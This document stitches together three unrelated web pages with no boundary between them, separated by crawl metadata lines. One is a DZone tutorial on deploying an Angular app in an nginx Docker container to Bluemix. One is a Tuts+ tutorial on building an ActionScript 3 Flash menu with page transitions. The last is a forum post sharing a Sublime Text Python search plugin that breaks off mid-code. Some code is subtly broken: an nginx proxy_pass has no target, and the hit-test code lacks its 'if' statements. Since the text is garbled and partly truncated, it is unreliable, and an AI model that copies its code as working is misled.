Deploying Angular 2 Apps to Bluemix In this post we take a look at how to deploy your Angular 2 app as a Docker container to IBM's Bluemix and the light configuration you need to do to make it work. Join the DZone community and get the full member experience.Join For Free over the last few months, i’ve done quite a lot of angular 2 development (now angular 4). below is a description how to create a new angular app and deploy it as a docker container to bluemix in just a few minutes. in order to create a new angular app, you can use the angular cli . npm install -g @angular/cli ng new angular-app cd angular-app ng build --prod there are several ways to deploy angular apps to bluemix. for example, you can build a simple node.js web server to host the files. or you can leverage existing http servers like nginx . you can use nginx in the cloud foundry staticfile-buildpack or in docker. since i experienced issues with the cloud foundry buildpack (i couldn’t enforce https), the following steps show how to use docker. copy the following lines in the file ‘dockerfile’ in your project’s root directory. from nginx:latest copy nginx.conf /etc/nginx/conf.d/default.conf copy dist /usr/share/nginx/html copy the following lines into ‘nginx.conf’. there are many other features nginx provides that can be configured in this file, e.g. gzip settings and caching. server { listen 80; charset utf-8; sendfile on; root /usr/share/nginx/html; location / { expires -1; add_header pragma "no-cache"; add_header cache-control "no-store, no-cache, must-revalidate, post-check=0, pre-check=0"; try_files $uri $uri/ /index.html = 404; } location /api/v1/namespaces/ { proxy_pass; } } the location ‘/api/v1/namespaces/’ is an example how to invoke a rest api from your angular app, in this case, to invoke an openwhisk action. next, the docker container needs to be built. docker build -t angular-app . docker tag angular-app registry.ng.bluemix.net/nheidloff/angular-app docker push registry.ng.bluemix.net/nheidloff/angular-app there are different ways to run the container on bluemix — for example, as scalable container group or in a kubernetes cluster. for testing purposes, you can also run the container as single instance with a public ip address: bx ic run --name angular-app -p 80 -m 128 registry.ng.bluemix.net/nheidloff/angular-app bx ic ips bx ic ip-bind 169.46.26.176 angular-app bx ic inspect angular-app this is the file structure of the angular project. Published at DZone with permission of Niklas Heidloff, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/deploying-angular-2-apps-to-bluemix
CC-MAIN-2022-27
refinedweb
464
57.57
Navigation is a crucial part of your website, but often a bore to build and maintain. In this tutorial I'll describe a quick and solid way of using basic ActionScript skills, blended with a bit of your creativity, to construct intuitive & user friendly navigation systems. Okay, time to get our hands dirty, well... sweaty maybe... Introduction This tut demonstrates how to prevent double-clicking items within the menu, a much overlooked item that enhances your online experience. You'll also learn how to create and combine multiple arrays with ease. First we'll layout the scene, place keyframes and labels, then at the end we'll add some ActionScript to make it come alive. We'll also learn how to create page transitions which add a nice little extra to your website. In retrospect, this tutorial is very simple, but it covers a lot of hidden gems. Be creative, link the data with xml, alter the mask shapes, change the button rollOver states and enjoy it. Step 1 : Preparing the Buttons Create a new ActionScript 3 document : 600px X 400px, 30frames per second and use white as a background. First things first, lets create the button. Draw a textbox on stage and give it an instance name of "txt". To do this go to your properties panel (CTRL F3 / Window > properties > properties). Now covert it into a symbol (F8 / Modify > Convert to Symbol), choose movieclip and make sure the registration point is at the top left. Name the instance "button_text_mc". On a new layer, make a rectangle which fits the boundings of your text movieclip. This will function as a hit area for your button. Convert it into a symbol. Now select both layers and convert them into a symbol. Name this instance "hitarea_mc". Make sure you put the alpha value of "hitarea_mc" at zero in the properties window. Step 2 : Placing the Buttons Now let's make a holder for our buttons. Of course you can make this more advanced by making this a full dynamic navigation with xml or php, but for the sake of this tutorial we'll use some ActionScript to name our menu items and fill in the functionality. Drag one instance of the movieclip "button_movieclip" on stage for each item you want for your navigation. We'll use 6 in this case. Now give each instance a unique name; I chose b1,b2,... up to b6. Next we're going to wrap this all up in a new movieclip named "menu_total". The good thing about this is, if we want to use it later on we can simply drag the "menu_total" clip out of the library and use it directly. You should now have a single movieclip on stage holding six buttons which we'll transform into our navigation. Step 3 : rollOver/rollOut States on the Timeline Aah the fun part. Some animation and trickery. As you see in the example, the menu only reveals itself when the mouse cursor moves near the menu box and line. To achieve this, we'll need an invisible hitarea and some keyframes to move to a different state of view. Make sure you are inside the "menu_total" movieclip and create 2 new layers at the very top of your layers: one named "code", the other named "labels". Select the "labels" layer and add a blank keyframe on frame 1, 2, 10, 24, 25, 37. Now name the second framelabel "CLOSED", the 10th framelabel "OVER" and the 25th framelabel "OUT". Create a new layer underneath the buttons layer and name it "hit_area", then take the movieclip "hitarea_mc" from your library and place it to the left of the buttons. Lastly, rescale it so the user has some room to move the mouse. Make sure the keyframes for "HOVER" only reach to frame 10. Create yet another layer and name it "menu_out", then go to frame 10 and place another copy of the "hit_area_mc" on stage. Give it an instance name of "HOVEROUT_MC" and make sure that both these movieclips have an alpha value of 0. Also, these two hit area movieclips need to overlap a bit. Otherwise Flash will lose the hit test when you move the mouse towards the buttons. OK, with all that done, your frames and labels should now look like this: This is how the hit areas for the mouse should look: This is what the second hitarea should look like: it starts on the keyframe of the over state. Now let's take a look at the masking. Step 4 : Add the loaderimage Movieclip Across the span of your animation for the rollOver/rollOut states, make an empty movieclip and give it an instance name of "loaderclip". Step 5: Prepare Your External SWF Files This bit's entirely up to you and your imagination, but here's a basis which should get you started. Create a new ActionScript 3.0 file with the same dimensions as your main file. Build your page in/out animation. Make sure you place a stop(); command at the end state of your animation (the place where the actual content will come). Save your files as page1.swf, page2, ... up to the amount of buttons you created, in this case 6. In my utterly simple example I started with a small box which tweens along the timeline from alpha 0 to 100 whilst it grows to its final height. Step 6 : Action!...But Wait... Right, now some ActionScript time. First of all, you can spice up whatever happens with the menu however you wish. For example, you could use more advanced rollOver/rollOut animations. For the sake of this tutorial I've chosen a very simple effect. You will need to download and import the opensource class built by Grant Skinner named "tweenmax". Make sure you download the AS3 version. We'll also use the built in classes for the transitions. Step 7 : Action!...Are You Sure? - Yep! With your code layer selected on frame one, enter the code in the following steps (I will explain each line in the comments). Note: from this point it's very easy to make a new array with all your actions and link it to the onRelease handler, the same way as you link the buttonnames to the actual movieclips. With minimal effort you can build a very strong navigation system that can be reused over and over in no time. You could build a class for this, but that's not the purpose of this tutorial. Step 8: Action!...Imports import gs.TweenMax;import fl.motion.easing.*;import fl.transitions.*;import fl.transitions.easing.*; Step 9: Action!..Variables //variables for the button rollover,out,hit state var speed:Number = 0.3;var motion:Function = Sine.easeOut;var colourOver:String = "0x9BE07C";var colourOut:String = "0x000000";var colourRelease:String = "0xFF0000"; //store the buttons as an object for later use or reference. var btn:Object;var disabledBtn:Object; //The currentPage,nextPage variable holds the movieclips we will load. var currentPage:MovieClip = null;var nextPage:MovieClip = null; //the loader var loader:Loader; //which movieclip to load var urlRequest:URLRequest; //the name for our menu movieclip.MENUNAME.txt.text = "MENU >"; Step 10: Action!..Set Up Arrays With Our Data //first we'll reference to all the buttons on the stage var buttons:Array = new Array (b1, b2, b3, b4, b5, b6); //this array holds all the names we want to use for our buttons var button_name:Array = new Array ("Home", "About Us", "Selected Work", "References", "Jobs", "Contact"); //this array stores which swf we want to load var swf_array:Array = new Array ("swf1.swf","swf2.swf","swf3.swf","swf4.swf","swf5.swf","swf6.swf"); Step 11: Action!...Loop Through the Button Array for (var i:String in buttons) { //assign the button_name array to the textclip of our buttons buttons[i].button_txt.txt.text = button_name[i]; //assign which swf we'll load for each of the buttons buttons[i].currentPage = swf_array[i]; //declare that we'll use the movieclip as a button buttons[i].buttonMode = true; //make sure that the button_txt clip doesn't react to the mouse buttons[i].button_txt.mouseChildren = false; //add the listeners for our buttons buttons[i].addEventListener (MouseEvent.CLICK,onCLICK); buttons[i].addEventListener (MouseEvent.MOUSE_OVER,onOVER); buttons[i].addEventListener (MouseEvent.MOUSE_OUT,onOUT); } Step 12: Action!...EventListeners: function onCLICK (event:MouseEvent):void{ //make sure the variable of our current target is stored, we'll adress it later on to the function to disable it's state btn = event.currentTarget; disableBtn (btn);};function onOVER (event:MouseEvent):void{ btn = event.currentTarget; //here we tween to the over color we've assigned earlier on with the variables. TweenMax.to (btn , speed , {tint:colourOver, ease:motion});};function onOUT (event:MouseEvent):void{ btn = event.currentTarget; TweenMax.to (btn , speed , {tint:colourOut, ease:motion});}; Step 13: Action!...Build the Machine! This is the main core of our project. Every important step is commented in the code. function disableBtn (btn:Object):void { //if the button is disabled we'll make sure every event is back in it's place so we can use it again if (disabledBtn) { disabledBtn.buttonMode = true; disabledBtn.mouseEnabled = true; TweenMax.to (disabledBtn , speed , {tint:colourOut , ease:motion}); disabledBtn.addEventListener (MouseEvent.CLICK,onCLICK); disabledBtn.addEventListener (MouseEvent.MOUSE_OUT,onOUT); disabledBtn.addEventListener (MouseEvent.MOUSE_OVER,onOVER); } TweenMax.to (btn , speed , {tint:colourRelease , ease:motion}); //disabling means not being able to use it anymore, so here we remove all functionality btn.buttonMode = false; btn.mouseEnabled = false; btn.removeEventListener (MouseEvent.CLICK,onCLICK); btn.removeEventListener (MouseEvent.MOUSE_OUT,onOUT); btn.removeEventListener (MouseEvent.MOUSE_OVER,onOVER); //make sure the current selected button is labeled as disabledBtn. disabledBtn = btn; //Create a new loader instance loader = new Loader(); //add the currentPage variable to the url request urlRequest = new URLRequest(btn.currentPage); //load the url request loader.load (urlRequest); //once the file has been loaded we'll trigger the fileLoaded function loader.contentLoaderInfo.addEventListener (Event.COMPLETE, isLoaded); } function isLoaded (event:Event):void { //The loader now contains the page we are going to display later on nextPage = event.target.content; //check if there is a currentPage if (currentPage != null) { //tween the alpha to zero //so wait...why are we using 2 different tweenclasses? well, just to show you the benefits and disadvantages of both. Decide for yourself which one you find most suitable for your projects. var tweenAlpha:Tween = new Tween(currentPage, "alpha", Regular.easeOut, 1, 0, .7, true); //additionally, you can make the currentPage perform an extra outgoing animation. Make sure you toy around with the length of your alpha so it doesn't dissapear before the animation is done. currentPage.gotoAndPlay (31); //currentPageGone will be called when the tween is finished tweenAlpha.addEventListener (TweenEvent.MOTION_FINISH, currentPageOut); } else { //if there is no currentPage we'll trigger the showNextPage function. doNextPage (); } } function doNextPage ():void { //position the loaderclip as nextPage nextPage.x = 238.0; nextPage.y = 0; //Tween the alpha from 0 to 1 var tweenAlpha:Tween = new Tween(nextPage, "alpha", Regular.easeOut, 0, 1, .3, true); //Add the next page to the stage addChild (nextPage); //Next page is now our current page - confusing? It isn't. We replace the next page with our current one. currentPage = nextPage; } //Once the animation is completed we'll trigger this function function currentPageOut (event:Event):void { //Remove the current page completely from the stage removeChild (currentPage); //Let's show the next page doNextPage (); } //don't place a stop command because we will directly land on frame 2. Step 14: Action!...HitTest For Menu Open Finally, we move up one frame. Make sure you're at frame 2 of the menu_total movieclip. //add an eventlistener for the mousemove HOVER.addEventListener(MouseEvent.MOUSE_MOVE, openmenu); function openmenu(e:Event):void { //when the mouse x & y values is inside the movieclip clip named "HOVER", the hittest is true HOVER.hitTestPoint(parent.mouseX, parent.mouseY, true) { gotoAndPlay("OVER"); //make sure we remove the listener so we can't trigger this by accident. HOVER.removeEventListener(MouseEvent.MOUSE_MOVE, openmenu); } }stop(); Step 15: Action!...HitTest For Menu Out Now move over to frame 24 of the menu_total movieclip. //add an eventlistener for the mousemove HOVER_OUT.addEventListener(MouseEvent.MOUSE_MOVE, menuout); function menuout(e:Event):void { //when the mouse x & y values is inside the movieclip clip named "HOVER_OUT", the hittest is true HOVER_OUT.hitTestPoint(parent.mouseX, parent.mouseY, true) { gotoAndPlay("OUT"); //make sure we remove the listener so we can't trigger this by accident. HOVER_OUT.removeEventListener(MouseEvent.MOUSE_MOVE, menuout); } }stop(); Step 16: Action!...Go To "Closed" Frame: On the last frame of your animation, simply set the following line of code. The reason being that we skip frame 1 so the menu doesn't load again thus losing the active/disabled state. gotoAndStop("CLOSED") Conclusion So there we are! You learned how to enable/disable clicked buttons in an array with combined data, use masking techniques and how to create simple but effective menu systems which can be reused with minimal effort. All this with a simple but effective page transition. I hope you enjoyed this one and found a practical way to speed up your workflow in Flash. Envato Tuts+ tutorials are translated into other languages by our community members—you can be involved too!Translate this post
http://code.tutsplus.com/tutorials/build-a-versatile-actionscript-30-menu-with-masking--active-409
CC-MAIN-2016-36
refinedweb
2,198
66.03
Hi there! This patch should improve i18n-to-gettext.pl to work with all plugins 1.It also lists i18n.h as there seem to be some plugin-writer putting translations there. 2. It also strips // comments being in lines without "," at the end. 3. it strips /* ... */ comments being in just one line 4. it strips /* ... */ comments spreading over multiple line 5. it just ignores #if and #endif lines (like used to make plugins compile with older vdr-versions which had less languages supported). General question: Why is the locale dir called de_DE and not just de - as that seems what most other programs on my system do? Matthias -- Matthias Schwarzott (zzam) -------------- next part -------------- A non-text attachment was scrubbed... Name: vdr-1.5.7-improve-i18n-to-gettext.diff Type: text/x-diff Size: 1482 bytes Desc: not available Url :
https://www.linuxtv.org/pipermail/vdr/2007-August/013738.html
CC-MAIN-2017-17
refinedweb
141
77.03
- 30 Aug, 2016 2 commits chpass directly. - Jonathon Duerig authored Fix project selection in genilib-editor. Embed html snippets inside of genilib-editor main page. - 29 Aug, 2016 38 commits stopped setting this, but does not really matter since we do not use it anymore.. we were not checking this, the user would get an obscure error later. This required reorg of the credential code, since we do not want to duplicate the work of generating the credentials just to see if they are expired. Watch for and adapt if the user certificate/speaksfor is expired, need to use an SA auth credential. the MFS. This makes it possible to terminate a slice that has been paniced, since we do not want to the nodes to boot back into whatever they were doing before, just so we terminate the slice. not happy with that part yet. 1. Wrap in a timeout to prevent runway looping that burns up all CPUs. Clearly a bug in medusa. 2. Support for multiple runs using different modules, specifically the VNC module. be displayed in the web interface. Not going to us this code now, but might as well commit it. can pass additional credentials, those that are not owned by the user. (previously, we looked for expired speaksfor). If either is expired, we fallback to generating an SA certificate (which we can do cause all slices are in our namespace). is the local cluster. This closes issue #114. delay osid. Do not reload nodes whose underlying image has moved to a new version. Not typically what the user wants. Mostly for debugging.. that it can be reused as for dataset snapshots. This was one of the reasons that imaging progress modal was not slightly messed up for datasets. allocating so we can change the state in the display. The metadata does not have anything sensitive, and this is easier than rolling it into the secure download path via the CM. its an admin page.
https://gitlab.flux.utah.edu/emulab/emulab-devel/commits/4a73b9ce65b69d8b68933926600befe34542f7fa
CC-MAIN-2020-05
refinedweb
330
76.11
$ cnpm install pjtest Paddle.js is an Web project for Baidu Paddle, which is an an open source deep learning framework designed to work on web browser. Load a pretrained paddle.js SavedModel or Paddle Hub module into the browser and run inference through Paddle.js. It could run on nearly every browser with WebGL support. Web project is built on Atom system which is a versatile framework to support GPGPU operation on WebGL. It is quite modular and could be used to make computation tasks faster by utilizing WebGL. Web project could run TinyYolo model in less than 30ms on chrome. This is fast enough to run deep learning models in many realtime scenarios. Currently Paddle.js only supports a limited set of Paddle Ops. See the full list. If your model uses unsupported ops, the Paddle.js script will fail and produce a list of the unsupported ops in your model. Please file issues to let us know what ops you need support with. Supported operations Pages If the original model was a SavedModel, use paddle.load(). import Paddle from 'paddlejs'; let feed = io.process({ input: document.getElementById('image'), params: { gapFillWith: '#000', // What to use to fill the square part after zooming targetSize: { height: fw, width: fh }, targetShape: [1, 3, fh, fw], // Target shape changed its name to be compatible with previous logic // shape: [3, 608, 608], // Preset sensor shape mean: [117.001, 114.697, 97.404], // Preset mean // std: [0.229, 0.224, 0.225] // Preset std } }); const MODEL_CONFIG = { dir: `/${path}/`, // model URL main: 'model.json', // main graph }; const paddle = new Paddle({ urlConf: MODEL_CONFIG, options: { multipart: true, dataType: 'binary', options: { fileCount: 1, // How many model have been cut getFileName(i) { return 'chunk_' + i + '.dat'; } } } }); model = await paddle.load(); // let inst = model.execute({ input: feed }); // There should be a fetch execution call or a fetch output let result = await inst.read(); Please see feed documentation for details. Please see fetch documentation for details. The converter expects a Paddlejs SavedModel, Paddle Hub module, paddle.js JSON format for input. The conversion script above produces 2 types of files: Paddle.js has some pre-converted models to Paddle.js format .There are some demos in the following URL, open a browser page with the demo.
https://developer.aliyun.com/mirror/npm/package/pjtest/v/1.0.0
CC-MAIN-2020-50
refinedweb
375
60.01
Before you start thinking of changing the schema, you need to consider not just the namespace, but also the data your Active Directory will hold. After all, if you know your data, you can decide what changes you want to make and whom those changes might impact. No matter how you migrated to Active Directory, at some point you'll need to determine exactly what data you will add or migrate for the objects you create. Will you use the physicalDeliveryOfficeName attribute of the user object? What about the telephonePager attribute? Do you want to merge the internal staff office location list and telephone database during the migration? What if you really need also to know what languages each of your staff speaks or qualifications they hold? What about their shoe size, their shirt size, number of children, and whether they like animals? The point is that some of these already exist in the Active Directory schema and some don't. At some point you need to design the actual data that you want to include. Let's consider MyUnixCorp, a large fictional organization that for many years has run perfectly well on a large mainframe system. The system is unusual in that the login process has been completely replaced in-house with a two-tier password system. A file called additional-passwd maintains a list of usernames and their second Unix password in an encrypted format. Your design for the migration for MyUnixCorp's system has to take account of the extra login check. In this scenario, either MyUnixCorp accepts that the new Active Directory Kerberos security mechanism is secure enough for its site, or it has to add entries to the schema for the second password attribute and write a new Active Directory logon interface that incorporates both checks. This example serves to outline that the data that is to be stored in Active Directory has a bearing on the schema structure and consequently has to be incorporated into the design phase. When you identify a deficiency in the schema for your own Active Directory, you have to look hard into whether modifying the schema is the correct way forward. Finding that the schema lacks a complete series of objects along with multiple attributes is a far cry from identifying that the Person-who-needs-to-refill-the-printer-with-toner attribute of the printer object is missing from the schema. There's no rule, either, that says that once you wish to create three extra attributes on an existing object, you should modify the schema. It all comes down to choice. To help you make that choice, you should ask yourself whether there are any other objects or attributes that you could use to solve your problem. Let's say you were looking for an attribute of a user object that would hold a staff identification number for your users. You need to ask whether there is an existing attribute of the user object that could hold the staff ID number and that you are not going to use. This saves you from modifying the schema if you don't have to. Take Leicester University as an example. We had a large user base that we were going to register, and we needed to hold a special ID number for our students. In Great Britain, every university student has a so-called University and Colleges Administration System number, more commonly known as the UCAS number, a unique alphanumeric string that UCAS assigns independent of a student's particular university affiliation. Students receive their UCAS numbers when they first begin looking into universities. The numbers identify students to their prospective universities, stay with students throughout their undergraduate careers, and are good identifiers for checking the validity of students' details. By default, there is no schema attribute called UCAS-Number, so we had two choices. We could find an appropriately named attribute that we were not going to use and make use of that, or we could modify the schema. Since we were initially only looking to store this piece of information in addition to the default user information, we were not talking about a huge change in any case. We simply looked to see whether we could use any other schema attributes to contain the data. We soon found the employeeID user attribute that we were not ever intending to use, and which seemed to fit the bill, so we decided to use that. While it isn't as appropriately named as an attribute called UCAS-Number would be, it did mean that we didn't have to modify the base schema in this instance. The important point here is that we chose not to modify the schema, having found a spare attribute that we were satisfied with. We could just as easily have found no appropriate attributes and decided to go through making the schema changes using our own customized attributes. If you've installed Exchange 2000 into the forest, there is also a set of attributes available to use for whatever you need. These are known as the extension or custom attributes and have names like extensionAttribute1, extensionAttribute2, and so on. These are never used by the operating system and have been left in for you to use as you wish. There are 20 created by default, thus giving you spare attribute capacity already in Active Directory. So if we wanted to store the number of languages spoken by a user, we could just store that value inside extensionAttribute1 if we chose. You can see how these attributes have been designed by using the Schema Manager. Extension attributes and making use of unused attributes works well for a small number of cases. However, if there were 20, 30, or more complex attributes each with a specific syntax, or if we needed to store 20 objects with 30 attributes each, we would have more difficulty. When you have data like that, you need to consider the bigger picture. So you have a list of all your data and suspect either that the schema will not hold your data or that it will not do so to your satisfaction. You now need to consider the future of your organization's schema and design it accordingly. The following questions should help you decide how to design for each new classSchema or attributeSchema object. Is this classSchema or attributeSchema object already held in the schema in some form? In other words, does the attribute already exist by default or has someone already created it? If it doesn't exist, you can create it. If it does already exist in some form, can you make use of that existing attribute? If you can, you need to consider doing so. If you can't, you need to consider modifying the existing attribute to cope with your needs or creating a second attribute that essentially holds similar or identical data, which is wasteful. If the existing attribute is of no use, can you create a new one and migrate the values for the existing attribute to the new one and disable the old one? These are the sorts of questions you need to be thinking of. Is this a classSchema or attributeSchema object that is to be used only for a very specific purpose, or could this object potentially be made of use (i.e., created, changed, and modified) by others in the organization? If the object is for only a specific purpose, the person suggesting the change should know what is required. If the object may impact others, care should be taken to ensure it is designed to cope with the requirements of all potential users, for example, that it can later be extended if necessary, without affecting the existing object instances at the moment the schema object is updated. For an attribute, for example, you should ask whether the attribute's syntax and maximum/minimum values (for strings or integers) are valid or whether they should be made more applicable to the needs of the many. Specifically, if you created a CASE_INSENSITIVE_STRING of between 5 and 20 characters now and later you require that attribute to be a CASE_SENSITIVE_STRING of between 5 and 20 characters, you may or may not have a problem depending on whether you care that the values for the case-insensitive strings are now case-sensitive. You obviously could write a script that goes through Active Directory and modifies each string appropriately, but what if you had changed the schema attribute to a CASE_SENSITIVE_STRING of between 8 and 20 characters? Then you have another problem if there are any strings of between 5 and 7 letters. These attributes would be invalid, since their contents are wrong. We think you can see the sort of problems that can occur. Are you modifying an existing object with an attribute? If so, would this attribute be better if it were not applied directly to the object, but instead added to a set of attributes within an auxiliary class classSchema object? Are you adding a mandatory attribute to an existing object that will suddenly make all existing instances invalid? Say you added a new mandatory attribute called languages-spoken to the User class. Since none of the existing users have this attribute set initially, you instantly make all the users invalid. You have to make sure, though, in this specific case, that you will never create users via Active Directory Users and Computers MMC, because this tool will not be aware of your new mandatory requirement and so cannot create valid users any more. You must be aware of the impact that your changes may have on existing tools and ones that you design yourself. Basically, these questions boil down to four much simpler ones: Is the change that needs to be made valid and sensible for all potential uses and users of this object? Will my change impact any other changes that may need to be made to this and other objects in the future? Will my change impact anyone else now or in the future? Will my change impact any applications that people inside or outside the company are developing? The Schema Managers group needs to sit down with all groups of people who potentially would like to make changes to the schema, brief them on how the schema operates, and attempt to identify the sorts of changes that need to be made by these groups. If a series of meetings is not your style, consider creating a briefing paper, followed by a form to request schema updates, issued to all relevant department heads. If you allow enough time, you will be able to collate responses received and make a good stab at an initial design. You can find attributes that may conflict, ways of making auxiliary classes rather than modifications to individual attributes, and so on. This gives the Schema Managers a good chance to come up with a valid initial design for the schema changes prior to or during a rollout. An important rule of thumb is never to modify default system attributes. It makes sure that we never conflict with anything considered as default by the operating system, which might eventually cause problems during upgrades or with other applications such as Exchange. Adding extra attributes to objects is fine, but avoid modifying existing ones.
http://etutorials.org/Server+Administration/Active+directory/Part+II+Designing+an+Active+Directory+Infrastructure/Chapter+12.+Designing+and+Implementing+Schema+Extensions/12.2+Thinking+of+Changing+the+Schema/
CC-MAIN-2017-30
refinedweb
1,898
57.91
Print formatted output to a new string #include <qdb/qdb.h> char * qdb_mprintf( const char* fmt,... ); qdb This function is a variant of sprintf() from the standard C library. The resulting string is written into memory obtained from malloc(), so there is never a possibility of buffer overflow. This function also implements some additional formatting options that are useful for constructing SQL statements. You should call free() to free the strings returned by this function. All the usual printf() formatting options apply. In addition, there is a %q option. The %q option works like %s: it substitutes a null-terminated string from the argument list. But %q also doubles every \' character (every escaped single quotation). %q is designed for use inside a string literal. By doubling every \' character, it escapes that character and allows it to be inserted into the string. For example, suppose some string variable contains text as follows: char *zText = "It's a happy day!"; You can use this text in an SQL statement as follows: qdb_mprintf(db, "INSERT INTO table VALUES('%q')", zText); Because the %q format string is used, the \' character in zText is escaped, and the SQL generated is as follows: INSERT INTO table1 VALUES('It''s a happy day!') This is correct. Had that it also adds single quotes around the outside of the total string. Or, if the parameter in the argument list is a NULL pointer, %Q substitutes the text "NULL" (without single quotes) in place of the %Q option.. QNX Neutrino qdb_snprintf(), qdb_vmprintf(), printf() in the Neutrino Library Reference
http://www.qnx.com/developers/docs/6.5.0SP1.update/com.qnx.doc.qdb_en/api/qdb_mprintf.html
CC-MAIN-2018-26
refinedweb
259
57.37
Does C++ have any type of hash? I know in ruby you could create hashes but does C++ have this? And if it does can you show me an example of how to use it? If not then is there something similar to a hash? Does C++ have any type of hash? I know in ruby you could create hashes but does C++ have this? And if it does can you show me an example of how to use it? If not then is there something similar to a hash? C++ has no hash table. The map class is similiar, but it's not hash based (lookups are slower, but it keeps the data ordered, note how the output is printed in alphabetical order). I can almost guarentee hash maps will be in the next version of the standard, and it's a pretty big lack IMO. Code: #include <iostream> #include <map> #include <string> int main() { std::map<std::string, int> nameToNum; nameToNum["one"] = 1; nameToNum["two"] = 2; nameToNum["three"] = 3; nameToNum["four"] = 4; std::cout << nameToNum["three"] << std::endl; for (std::map<std::string,int>::iterator i = nameToNum.begin(); i != nameToNum.end(); ++i) { std::cout << i->first << ' ' << i->second << std::endl; } return 0; } I may be in the minority, but I don't really see the point in hash tables. If you have ot use a hash table then you can probably recode it to be more efficient. But that is just my opinion. Recode what? If you want to search fast, hash tables work nicely. Munkey01, it is a matter of time. Programming should be efficient. For example, I *could* write my own more efficient I/O classes, but it will take time which can be spent elsewhere. Thanks guys. I just wanted to know because I know when i used Ruby they came in handy. >>If not then is there something similar to a hash? You can make your own hash with a vector and list pretty easily. Code: #include <iostream> #include <string> #include <vector> #include <list> using namespace std; const int hsize = 101; int my_hash(string str) { int h = 0; string::iterator iter; for (iter = str.begin(); iter != str.end(); ++iter) { h = *iter + 31 * h; } return h % hsize; } string my_lookup(vector<list<string> >& table, string& item) { list<string> tlist = table[my_hash(item)]; list<string>::iterator iter; for (iter = tlist.begin(); iter != tlist.end(); ++iter) { if (*iter == item) { return *iter; } } return ":nonexistant:"; } int main() { string word; vector<list<string> > table(hsize); table[my_hash("now")].push_front("now"); table[my_hash("is")].push_front("is"); table[my_hash("the")].push_front("the"); table[my_hash("time")].push_front("time"); cout<<"Enter a word to find: "<<flush; getline(cin, word); cout<<"Found -- "<< my_lookup(table, word) <<endl; } STLport includes the common extention hash_map, it's worthwile for the debug mode alone. As others have said this will probably make it to the next version of the standard. I still recomend writing your own, builds character.
http://cboard.cprogramming.com/cplusplus-programming/32480-hashes-printable-thread.html
CC-MAIN-2014-41
refinedweb
488
72.97
Credit: Sébastien Keim, Alex Martelli, Raymond Hettinger, Jeremy Fincher, Danny Yoo, Josiah Carlson You need a container that allows element insertion and removal, in which the first element inserted is also the first to be removed (i.e., a first-in first-out, FIFO, queue). We can subclass list to implement a Pythonic version of an idea found in Knuth's Art of Computer Programming: the frontlist/backlist approach to building a FIFO out of two one-way linked lists. Here's how: class Fifo(list): def _ _init_ _(self): self.back = [ ] self.append = self.back.append def pop(self): if not self: self.back.reverse( ) self[:] = self.back del self.back[:] return super(Fifo, self).pop( ) Here is a usage example, protected by the usual guard so it runs only when the module executes as a main script rather than being imported: if _ _name_ _ == '_ _main_ _': a = Fifo( ) a.append(10) a.append(20) print a.pop( ), a.append(5) print a.pop( ), print a.pop( ), print # emits: 10 20 5 The key idea in class Fifo is to have an auxiliary backlist, self.back, to which incoming items get appended. Outgoing items get popped from the frontlist, self. Each time the frontlist is exhausted, it gets replenished with the reversed contents of the backlist, and the backlist is emptied. The reversing and copying are O(n), where n is the number of items appended since the "front list" was last empty, but these operations are performed only once every n times, so the amortized cost of each call to pop is a constant—that is, O(1). A simpler way to build a FIFO in Python is no doubt to just use a standard list's append and pop(0) methods—something like: class FifoList(list): def pop(self): return super(FifoList, self).pop(0) However, when using a list in this way, we need to keep in mind that pop(0) is O(n), where n is the current length of the list. O(1) performance can be ensured by building the FIFO in a slightly less intuitive way, on top of a dictionary: class FifoDict(dict): def _ _init_ _(self): self.nextin = 0 self.nextout = 0 def append(self, data): self.nextin += 1 self[self.nextin] = data def pop(self): self.nextout += 1 return dict.pop(self, self.nextout) In Python 2.4, we also have collections.deque, a double-ended queue type that also ensures O(1) performance when used as a FIFO (using its append and popleft methods): import collections class FifoDeque(collections.deque): pop = collections.deque.popleft To choose among different implementations of the same interface, such as the various Fifo... classes shown in this recipe, the best approach often is to measure their performance on artificial benchmark examples that provide a reasonable simulation of the expected load in your application. I ran some such measurements on a somewhat slow laptop, with Python 2.4, using the timeit module from the Python Standard Library. For a total of 6,000 appends and pops, with a maximum length of 3,000, class Fifo takes about 62 milliseconds, class FifoList about 78, FifoDict about 137, and FifoDeque about 30. Making the problem exactly ten times bigger, we see the advantages of O(1) behavior (exhibited by all of these classes except FifoList). Fifo takes 0.62 seconds, FifoList 3.8, FifoDict 1.4, and FifoDeque 0.29. Clearly, in Python 2.4, FifoDeque is fastest as well as simplest; if your code has to support Python 2.3, the Fifo class shown in this recipe's Solution is best.
http://archive.oreilly.com/python/pythoncook2/solution3.html
CC-MAIN-2017-43
refinedweb
609
67.04
ParsePosition is a simple class used by Format and its subclasses to keep track of the current position during parsing. More... #include <parsepos.h> Parse. The ParsePosition class is not suitable for subclassing. Definition at line 47. Clone this object. Clones can be used concurrently in multiple threads. If an error occurs, then NULL is returned. The caller must delete the clone. Retrieve the index at which an error occurred, or -1 if the error index has not been set. Definition at line operator==(). Assignment operator. Definition at line 183 of file parsepos.h. Equality operator. Definition at line 191 of file parsepos.h. References FALSE, and TRUE. Referenced by operator!=()..
http://icu-project.org/apiref/icu4c434/classParsePosition.html
CC-MAIN-2018-05
refinedweb
111
63.05
I have made another plugin, which search all open buffers on sublime (all opened tabs) for a pattern. the pattern used is taken from the clipboard. i.e. you need to first select and copy a text, then start the search with the desired keyboard shortcut (ctrl+alt+f on this example). i would have used better input system, but i couldn't find any (suggestions/changes are welcomed) you can find this plugin (always updated) for download at the community repository or, do the following :1. make a new file named: Search.py under "%appdata%\Sublime Text\Packages\User", which contains: import sublime, sublimeplugin class SearchCommand(sublimeplugin.TextCommand): def run(self, view, args): failesafe = 1000 counter = 0 result = ] files_i_have_been = ] view_list = view.window().views() selection = view.sel()[0] if selection.begin() - selection.end() != 0: pattern = view.substr(selection) else: pattern = sublime.getClipboard() for a_view in view_list: # avoid re-searching same view (if opened twice) if a_view.fileName() in files_i_have_been: continue else: files_i_have_been.append(a_view.fileName()) # search next_region = view.line(0) # start from 0 while next_region is not False: region = a_view.find(pattern, next_region.begin(), 0) if region is not None: (row, col) = a_view.rowcol(region.begin()) s = a_view.substr(a_view.line(region)) full_s = a_view.fileName() + "<" + str(row+1) + "> " + s result.append(full_s) next_region = self.advance_line(a_view, region) else: break counter += 1 if counter > failesafe: break view.window().showQuickPanel("", "searchRebound", result) #for line in result: # print line def isEnabled(self, view, args): if view.fileName() is not None: return True else: return False def advance_line(self, view, last_region): (row, col) = view.rowcol(last_region.begin()) next_point = 